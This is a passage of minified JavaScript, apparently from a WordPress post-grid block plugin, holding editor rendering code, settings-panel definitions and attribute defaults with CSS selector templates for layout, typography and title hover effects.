Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)(E,null,(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${ge} ultp-block-content-${ye}`},l.postsList.map(((l,a)=>{const r=0==a?JSON.parse(oe.replaceAll("u0022",'"')):JSON.parse(ae.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ${be?"ultp-animation-"+be:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.A8,{imgOverlay:le,imgOverlayType:te,imgAnimation:ee,post:l,fallbackEnable:Pe,vidIconEnable:Be,catPosition:Y,imgCropSmall:Le,showImage:q,imgCrop:Ie,idx:a,showSmallCat:ie,Category:0!=a&&!ie||"aboveTitle"==Y?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:G,catStyle:J,catPosition:Y,customCatColor:ve,onlyCatColor:he,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}})),onClick:()=>{Ge("image"),qe("image")}}),Be&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{Ge("video"),qe("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${pe}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==Y&&(0==a||ie)&&(0,o.createElement)(i.Z,{post:l,catShow:G,catStyle:J,catPosition:Y,customCatColor:ve,onlyCatColor:he,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}}),t(6,l.ID),l.title&&K&&1==X&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Ge("title"),qe("title")}}),t(5,l.ID),V&&"top"==de&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:$,metaStyle:W,metaMinText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Ge("meta"),qe("meta")}}),t(4,l.ID),l.title&&K&&0==X&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Ge("title"),qe("title")}}),t(3,l.ID),(0==a||ue)&&Q&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:F,showFullExcerpt:me,showSeoMeta:we,onClick:e=>{Ge("excerpt"),qe("excerpt")}}),t(2,l.ID),(0==a||ce)&&ne&&(0,o.createElement)(u.Z,{readMoreText:re,readMoreIcon:se,titleLabel:l.title,onClick:()=>{Ge("read-more"),qe("read-more")}}),t(1,l.ID),V&&"bottom"==de&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:$,metaStyle:W,metaMinText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Ge("meta"),qe("meta")}}),t(0,l.ID),(0,b.o6)()&&Re&&(0,o.createElement)(v.Z,{dcFields:De,setAttributes:A,startOnboarding:Ve,overlayMode:!0,inverseColor:!0})))))})))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ue})}(),He&&"navigation"==Ze&&"topRight"!=Oe&&(0,o.createElement)(c.Z,{onClick:()=>{Ge("pagination"),qe("pagination")}}))))}},6544:(e,t,l)=>{"use strict";l.d(t,{FP:()=>h,PR:()=>b,ZP:()=>v});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(87025);const{__}=wp.i18n,{Sections:d,Section:m}=l(92637),{default:g}=l(43581),{useEffect:y}=wp.element,b=8;function v({store:e}){const{queryType:t,titleAnimationArg:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:s}}=e.attributes,{context:p,section:b,settingTab:v,setSettingTab:h}=e;return y((()=>{(0,u.CH)(p,n,e,r)}),[n,r,e.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(g,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6832",store:e}),(0,o.createElement)(d,{settingTab:v,setSettingTab:h},(0,o.createElement)(m,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,exclude:["queryNumber","queryNumPosts"],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(m,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:e,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-4",key:"layout",label:__("Layout","ultimate-post"),options:[{value:"layout1",img:"assets/img/layouts/pg4/l1.png",label:__("Layout 1","ultimate-post"),pro:!1},{value:"layout2",img:"assets/img/layouts/pg4/l2.png",label:__("Layout 2","ultimate-post"),pro:!0},{value:"layout3",img:"assets/img/layouts/pg4/l3.png",label:__("Layout 3","ultimate-post"),pro:!0},{value:"layout4",img:"assets/img/layouts/pg4/l4.png",label:__("Layout 4","ultimate-post"),pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:1e3,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:8,data:{data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post")}}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:3,label:__("Number of Post","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:b.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:b.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:b.meta,hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:e,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:e,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:e}),(0,o.createElement)(a.fm,{store:e,include:l}),!s&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:b.heading,depend:"headingShow"}),"posts"!=t&&"customPosts"!=t&&(0,o.createElement)(a.B0,{isTab:!0,store:e,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:e,include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText"]}))),(0,o.createElement)(m,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function h({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:c,catPosition:u,titlePosition:d,excerptShow:m,readMore:g,metaPosition:y,catShow:b}=t.attributes,v=[i&&"bottom"==y,g,m,c&&0==d,i&&"top"==y,c&&1==d,b&&"aboveTitle"==u];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:v});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}}],exSettings:["paginationType"],exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgMargin","imgWidth","imageScale","imgHeight"],exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},92829:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},columnFlip:{type:"boolean",default:!1},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); } \n          {{ULTP}} .ultp-layout4 .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}*2); } \n          {{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-block-row {grid-column-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-item:first-child {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:not(:first-child) .ultp-block-content-overlay {height: calc({{overlayHeight}}/2);} \n          {{ULTP}} .ultp-layout4 .ultp-block-item:not(:first-child) .ultp-block-content-overlay {height: calc({{overlayHeight}}/3);} \n          {{ULTP}} .ultp-layout2 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(3) .ultp-block-content-overlay {height: calc( {{overlayHeight}}/2.5 );} \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item:nth-child(3) .ultp-block-content-overlay {height: calc( {{overlayHeight}}/1.666 );} \n          {{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } @media (max-width: 768px) { \n          {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n          {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 );}}"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},queryNumber:{type:"string",default:"3",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]},{key:"querySticky",condition:"!=",value:!0}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square"},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"flat",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},showSmallCat:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt 